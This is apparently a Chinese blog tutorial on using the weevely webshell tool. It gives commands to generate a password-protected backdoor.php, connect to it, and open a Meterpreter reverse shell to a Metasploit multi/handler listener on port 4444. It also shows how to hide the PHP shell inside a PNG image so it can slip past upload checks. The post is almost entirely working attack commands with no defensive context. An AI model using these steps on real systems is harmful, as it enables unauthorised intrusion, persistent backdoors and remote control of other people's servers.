weevely工具的使用
生成shell
weevely generate 密码 路径 文件名
plaintext
weevely generate cmd ./backdoor.php(weevely --man中有命令) |
连接shell
weevely url 密码
plaintext
weevely http://127.0.0.1/backdoor.php cmd |
各项模块
键入:help查看更多帮助信息
weevely>:help
plaintext
信息搜集: |
反向shell连接MSF
在这使用:backdoor_meterpreter参数
:backdoor_meterpreter 反向shell
-payload php/meterpreter/reverse_tcp 是搭载的攻击载荷
-lhost 转发给监听的ip地址
-lport 监听端口
plaintext
weevely>:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 127.0.0.1 -port 4444 |
转发完成,接下来就是打开msf使用监听模块监听,获取控制权
plaintext
msf6 >use exploit/multi/handler #使用监听模块 |
合成图片木马
plaintext
cat image.png shell.php > shell.png |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 做 讓 人 远 远 聽 見 的 風!
评论